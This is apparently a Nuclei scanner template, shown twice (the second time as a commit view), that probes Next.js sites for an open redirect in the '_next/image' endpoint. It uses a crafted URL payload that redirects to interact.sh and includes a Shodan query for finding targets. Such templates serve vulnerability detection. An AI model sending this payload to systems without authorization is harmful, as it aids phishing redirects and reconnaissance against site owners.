nuclei-templates/vulnerabilities/other/nextjs-redirect.yaml

id: nextjs-redirect

info:
  name: Next.js Open Redirect on “_next/image” via Improper Path Parsing
  author: DhiyaneshDk
  severity: medium
  reference:
    - https://samcurry.net/universal-xss-on-netlifys-next-js-library/
  metadata:
    shodan-query: html:"/_next/static"
  tags: redirect,nextjs

requests:
  - method: GET
    path:
      - '{{BaseURL}}/_next/image?url=/\/\interact.sh/&q=100&w=128&h=128'

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'Location: /\/\/interact.sh'

      - type: status
        status:
          - 308
Create nextjs-redirect.yaml 2023-02-16 10:56:36 +00:00			`id: nextjs-redirect`

			`info:`
			`name: Next.js Open Redirect on “_next/image” via Improper Path Parsing`
			`author: DhiyaneshDk`
			`severity: medium`
			`reference:`
			`- https://samcurry.net/universal-xss-on-netlifys-next-js-library/`
			`metadata:`
			`shodan-query: html:"/_next/static"`
			`tags: redirect,nextjs`

			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/_next/image?url=/\/\interact.sh/&q=100&w=128&h=128'`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: header`
			`words:`
			`- 'Location: /\/\/interact.sh'`

			`- type: status`
			`status:`
			`- 308`